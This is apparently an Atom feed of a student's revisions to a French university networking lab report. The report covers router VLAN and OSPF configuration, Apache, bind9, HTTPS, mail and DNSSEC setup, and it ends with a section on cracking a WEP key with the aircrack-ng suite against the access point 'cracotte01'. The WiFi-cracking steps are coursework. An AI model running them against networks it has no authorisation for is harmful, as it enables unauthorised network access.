https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=Dfourny
Wiki d'activités IMA - Contributions de l’utilisateur [fr]
2026-04-24T17:58:17Z
Contributions de l’utilisateur
MediaWiki 1.29.2
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35587
TP sysres IMA2a5 2016/2017 G1
2016-12-02T10:34:15Z
<p>Dfourny : /* DNSSEC */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
On en profite pour forcer l'utilisation de HTTPS:<br />
<br />
$ vim /var/www/html/.htaccess<br />
<br />
RewriteEngine On<br />
RewriteCond %{HTTPS} !on<br />
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}<br />
<br />
$ a2enmod rewrite<br />
$ service apache2 restart<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
On génére le couple de clés KSK et ZSK:<br />
<br />
$ cd /etc/bind<br />
$ mkdir unic0rn.pw.dnssec ; cd unic0rn.pw.dnssec<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE unic0rn.pw<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE unic0rn.pw<br />
<br />
/dev/urandom n'est pas sécurisé comme générateur de chiffres aléatoires, il est préférable d'utiliser un générateur hardware.<br />
<br />
On ajoute les clés générées dans le fichier de zone:<br />
<br />
$ vim /etc/bind/unic0rn.pw<br />
<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-ksk.key<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-zsk.key<br />
<br />
On signe ensuite le fichier de zone (cela va générer unic0rn.pw.signed):<br />
<br />
$ dnssec-signzone -o unic0rn.pw -k unic0rn.pw-ksk ../unic0rn.pw unic0rn.pw-zsk<br />
<br />
Et on indique au serveur que l'on va utiliser dnssec:<br />
<br />
$ vim named.conf.options<br />
<br />
dnssec-enable yes;<br />
<br />
$ vim named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw.signed";<br />
};<br />
<br />
$ service bind9 restart<br />
<br />
La fonctionnalité DNSSEC n'étant pas supporté sur les domaines .PW, notre implémentation s’arrêtera ici.<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]<br />
<br />
[[File:Magic.gif]]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35584
TP sysres IMA2a5 2016/2017 G1
2016-12-02T09:07:49Z
<p>Dfourny : /* HTTPS */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
$ cp unic0rn.pw.crt /etc/ssl/certs/<br />
$ cp monserveur.key /etc/ssl/private/unic0rn.pw.key<br />
$ cp GandiStandardSSLCA2.pem /etc/ssl/certs/<br />
$ c_rehash /etc/ssl/certs <br />
<br />
Puis modifier la configuration d'apache2:<br />
<br />
$ vim /etc/apache2/sites-enabled/000-default.conf<br />
<br />
<VirtualHost *:443><br />
ServerName www.unic0rn.pw<br />
ServerAlias unic0rn.pw<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined <br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/unic0rn.pw.crt<br />
SSLCertificateKeyFile /etc/ssl/private/unic0rn.pw.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
Et on peut ensuite accéder à https://unic0rn.pw !<br />
On en profite pour forcer l'utilisation de HTTPS:<br />
<br />
$ vim /var/www/html/.htaccess<br />
<br />
RewriteEngine On<br />
RewriteCond %{HTTPS} !on<br />
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}<br />
<br />
$ a2enmod rewrite<br />
$ service apache2 restart<br />
<br />
=== Serveur email ===<br />
<br />
Le nom de domaine a un email de configuré (admin@unic0rn.pw), nous devons donc s'arranger pour recevoir les emails. On installe donc un serveur d'email:<br />
<br />
# apt-get install postfix<br />
# echo "admin: root" >> /etc/aliases<br />
<br />
On envoie un email et on vérifie les emails:<br />
<br />
# mail<br />
<br />
=== DNSSEC ===<br />
<br />
On génére le couple de clés KSK et ZSK:<br />
<br />
$ cd /etc/bind<br />
$ mkdir unic0rn.pw.dnssec ; cd unic0rn.pw.dnssec<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE unic0rn.pw<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE unic0rn.pw<br />
<br />
/dev/urandom n'est pas sécurisé comme générateur de chiffres aléatoires, il est préférable d'utiliser un générateur hardware.<br />
<br />
On ajoute les clés générées dans le fichier de zone:<br />
<br />
$ vim /etc/bind/unic0rn.pw<br />
<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-ksk.key<br />
$include /etc/bind/unic0rn.pw.dnssec/unic0rn.pw-zsk.key<br />
<br />
On chiffre signe ensuite le fichier de zone (cela va générer unic0rn.pw.signed):<br />
<br />
$ dnssec-signzone -o unic0rn.pw -k unic0rn.pw-ksk ../unic0rn.pw unic0rn.pw-zsk<br />
<br />
Et on indique au serveur que l'on va utiliser dnssec:<br />
<br />
$ vim named.conf.options<br />
<br />
dnssec-enable yes;<br />
<br />
$ vim named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw.signed";<br />
};<br />
<br />
$ service bind9 restart<br />
<br />
La fonctionnalité DNSSEC n'étant pas supporté sur les domaines .PW, notre implémentation s’arrêtera ici.<br />
<br />
== Attaque du WiFi ==<br />
<br />
On commence par activer le mode promicious de la carte wifi:<br />
<br />
# airmon-ng start wlan0mon<br />
<br />
On liste les points d'accès pour trouver une cible:<br />
<br />
# airodump-ng --encrypt wep wlan0mon<br />
<br />
J'ai décidé ici d'attaquer "cracotte01" (canal 10) qui est un point d'accès configuré en WEP. On commence donc par récupérer les paquets transitants par ce point d'accès:<br />
<br />
# airodump-ng -w out -c 10 -essid cracotte01 wlan0mon<br />
<br />
Heureusement pour nous, quelqu'un est déjà connecté dessus et génére beaucoup de paquets. On arrive rapidement à 200.000 paquets et on peut donc lancer le crack de la clé WEP:<br />
<br />
# aircrack-ng out-01.pcap<br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4 ]<br />
<br />
[[File:Magic.gif]]</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35582
TP sysres IMA2a5 2016/2017 G1
2016-12-02T09:05:13Z
<p>Dfourny : /* DNSSEC */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
